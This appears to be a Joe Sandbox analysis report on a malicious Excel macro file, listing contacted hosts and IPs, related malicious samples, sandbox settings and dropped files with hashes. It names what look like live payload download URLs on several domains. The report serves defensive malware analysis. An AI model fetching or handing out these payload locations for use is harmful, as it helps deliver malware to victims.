                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.netAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office.com/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                high
                                                                                                                https://storage.live.com/clientlogs/uploadlocationAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                  high
                                                                                                                  https://templatelogging.office.com/client/logAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                          high
                                                                                                                          https://management.azure.com/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                            high
                                                                                                                            https://login.windows.net/common/oauth2/authorizeAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                              high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://graph.windows.net/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                high
                                                                                                                                https://api.powerbi.com/beta/myorg/importsAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://devnull.onenote.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://ncus.pagecontentsync.AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.office.com/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v2AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/macAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.aiAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devicesAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    103.205.143.227
                                                                                                                                                    jacktech.jackindia.comIndia
                                                                                                                                                    132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse
                                                                                                                                                    8.211.4.209
                                                                                                                                                    laura9630fr.comSingapore
                                                                                                                                                    45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                                    74.208.236.90
                                                                                                                                                    moumitas.comUnited States
                                                                                                                                                    8560ONEANDONE-ASBrauerstrasse48DEfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                    Analysis ID:382553
                                                                                                                                                    Start date:06.04.2021
                                                                                                                                                    Start time:09:54:17
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 50s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:12345.xlsm
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:23
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal80.expl.evad.winXLSM@11/12@5/3
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsm
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.113.196.254, 13.107.3.254, 13.107.253.254, 52.255.188.83, 104.42.151.234, 92.122.145.220, 52.109.32.63, 13.64.90.137, 52.109.12.23, 52.109.76.36, 20.82.210.154, 92.122.213.247, 92.122.213.194, 168.61.161.212, 40.88.32.150, 205.185.216.42, 205.185.216.10, 52.147.198.201, 52.155.217.156, 20.54.26.129
                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, t-9999.fb-t-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, s-9999.s-msedge.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    103.205.143.227documents-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • jacktech.jackindia.com/ds/0204.gif
                                                                                                                                                    12345.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • jacktech.jackindia.com/ds/0204.gif
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • jacktech.jackindia.com/ds/0204.gif
                                                                                                                                                    documents-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • jacktech.jackindia.com/ds/0204.gif
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • jacktech.jackindia.com/ds/0204.gif
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • jacktech.jackindia.com/ds/0204.gif
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • jacktech.jackindia.com/ds/0204.gif
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • jacktech.jackindia.com/ds/0204.gif
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • jacktech.jackindia.com/ds/0204.gif
                                                                                                                                                    8.211.4.209documents-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • mills-skyla30ec.com/gg.gif
                                                                                                                                                    12345.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • mills-skyla30ec.com/gg.gif
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • mills-skyla30ec.com/gg.gif
                                                                                                                                                    documents-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • mills-skyla30ec.com/gg.gif
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • mills-skyla30ec.com/gg.gif
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • mills-skyla30ec.com/gg.gif
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • mills-skyla30ec.com/gg.gif
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • mills-skyla30ec.com/gg.gif
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • mills-skyla30ec.com/gg.gif
                                                                                                                                                    74.208.236.90documents-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • moumitas.com/ds/0204.gif
                                                                                                                                                    12345.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • moumitas.com/ds/0204.gif
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • moumitas.com/ds/0204.gif
                                                                                                                                                    documents-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • moumitas.com/ds/0204.gif
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • moumitas.com/ds/0204.gif
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • moumitas.com/ds/0204.gif
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • moumitas.com/ds/0204.gif
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • moumitas.com/ds/0204.gif
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • moumitas.com/ds/0204.gif

                                                                                                                                                    Domains

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    laura9630fr.comdocuments-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    12345.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    jacktech.jackindia.comdocuments-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    12345.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    mills-skyla30ec.comdocuments-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    12345.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCdocuments-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    12345.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    L87N50MbDG.exeGet hashmaliciousBrowse
                                                                                                                                                    • 8.209.67.151
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 8.211.4.209
                                                                                                                                                    Proforma invoice.docGet hashmaliciousBrowse
                                                                                                                                                    • 47.244.190.114
                                                                                                                                                    yPkfbflyoh.exeGet hashmaliciousBrowse
                                                                                                                                                    • 8.208.95.18
                                                                                                                                                    4CwmE1pYh5.exeGet hashmaliciousBrowse
                                                                                                                                                    • 47.91.72.80
                                                                                                                                                    com.multicamera.coolwending.translator.apkGet hashmaliciousBrowse
                                                                                                                                                    • 47.253.30.230
                                                                                                                                                    JYDy1dAHdW.exeGet hashmaliciousBrowse
                                                                                                                                                    • 8.208.95.18
                                                                                                                                                    EppTbowa74.exeGet hashmaliciousBrowse
                                                                                                                                                    • 8.208.95.18
                                                                                                                                                    tcNbszVulx.exeGet hashmaliciousBrowse
                                                                                                                                                    • 8.208.95.18
                                                                                                                                                    USHrlfZEJC.exeGet hashmaliciousBrowse
                                                                                                                                                    • 8.208.95.18
                                                                                                                                                    Order Drawing.exeGet hashmaliciousBrowse
                                                                                                                                                    • 47.241.107.134
                                                                                                                                                    msals.pumpl.dllGet hashmaliciousBrowse
                                                                                                                                                    • 8.208.95.92
                                                                                                                                                    NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINdocuments-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    12345.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-748443571.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-1887159634.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-683917632.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    documents-1760163871.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.227
                                                                                                                                                    ogknJKPa1C.apkGet hashmaliciousBrowse
                                                                                                                                                    • 43.228.237.131
                                                                                                                                                    ogknJKPa1C.apkGet hashmaliciousBrowse
                                                                                                                                                    • 43.228.237.131
                                                                                                                                                    #Ud83d#Udd04bvoneida- empirix.com iPhone 8 104 OKeep.htmGet hashmaliciousBrowse
                                                                                                                                                    • 103.83.192.66
                                                                                                                                                    PI.exeGet hashmaliciousBrowse
                                                                                                                                                    • 103.250.186.101
                                                                                                                                                    #Uc138#Uae08 #Uacc4#Uc0b0#Uc11c.exeGet hashmaliciousBrowse
                                                                                                                                                    • 103.205.143.111
                                                                                                                                                    22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.250.186.248
                                                                                                                                                    4vnTrjsACd.rtfGet hashmaliciousBrowse
                                                                                                                                                    • 103.250.186.248
                                                                                                                                                    955037-012021-98_98795947.docGet hashmaliciousBrowse
                                                                                                                                                    • 103.250.185.39
                                                                                                                                                    FEB_2021.EXEGet hashmaliciousBrowse
                                                                                                                                                    • 103.250.186.248
                                                                                                                                                    2S6VUd960E.exeGet hashmaliciousBrowse
                                                                                                                                                    • 103.250.186.248
                                                                                                                                                    ZjPOfkD2zH.exeGet hashmaliciousBrowse
                                                                                                                                                    • 103.250.186.248

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\AA6A7A15-C192-4C5E-9786-60055125516D
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):133170
                                                                                                                                                    Entropy (8bit):5.371011308483069
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:RcQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:BVQ9DQW+zTXiJ
                                                                                                                                                    MD5:D7809C02FD6EB6A22B3E3808C05F1757
                                                                                                                                                    SHA1:307D3D3608DD6593A52CA0E025AE0262B02C4BB6
                                                                                                                                                    SHA-256:C82D31EFC312252A8190463FDFD61940BB2A1AC94C388497ADE181FE015A8CCA
                                                                                                                                                    SHA-512:817DB548F7E14012A39C160B249B84130AD2CCFEE16B7207078B0B8CA82D1A31E5E6950927512943B88DF0B1BA6CED190459C54FE1CF103CF0140C3CE680C7F4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-06T07:55:10">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8DCEAA53.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 364 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8854
                                                                                                                                                    Entropy (8bit):7.949751503848125
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj
                                                                                                                                                    MD5:780FD0ABF9055E2D8FA1BAB6D4B9163E
                                                                                                                                                    SHA1:CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE
                                                                                                                                                    SHA-256:6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2
                                                                                                                                                    SHA-512:8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR...l.........E..7....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<.."#IDATx..]M.$.u.Y...V.Z!$......C.H2>.....JBR....c.2..k....'.f......qg..7O.W..0.'.bO6x...l..#!W...`h.~......Y...*+..._.x.".....#.....[........C.ISj..i..i.peOD..BT.N....IoD..qS..M{.I.D...!...[."A....GM........I.M......'T#D....&Q.H.."...Cqn"l....&.G.Mo....MI......u&.~.#k............R...<Q7%o~}.$d..L..j.<l..<...N.K.M"l.aU...G,N...v....LE..Y@.l....;n.?.Z%.&.V.....,.d".K^bM..B. ....B.l"l.a.....<...q...."K.....{.,...j.&...F.@xU......i.q..R.`u#<...........mR...j+ ..^.x...1TR..qw"l....&.a.W...}v.......S.zT..a...J.0....5... E..i"l.a%..<............lSM.a...N.........hI....."D...R.u....."Q.K.#.gM)}.L...*..b..D.y9{.kR7aA....:_..LL#......M...).{.l..O..lv...lP0l+....Y.Y.5.....j@$.C.h!qy/.D..%...g.c...D.......X..M$O.v%Z..S.%w..1"l....B'.O.I..B..}.............iL...X..3..`[.g...j..J.'...Y...rr..@m....@.uC.#......e!.4...M.a.y.......&h.o...Y.Q...@....N]6..."H.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8E55411A.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):848
                                                                                                                                                    Entropy (8bit):7.595467031611744
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                    MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                    SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                    SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                    SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\99DBB03D.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):557
                                                                                                                                                    Entropy (8bit):7.343009301479381
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                    MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                    SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
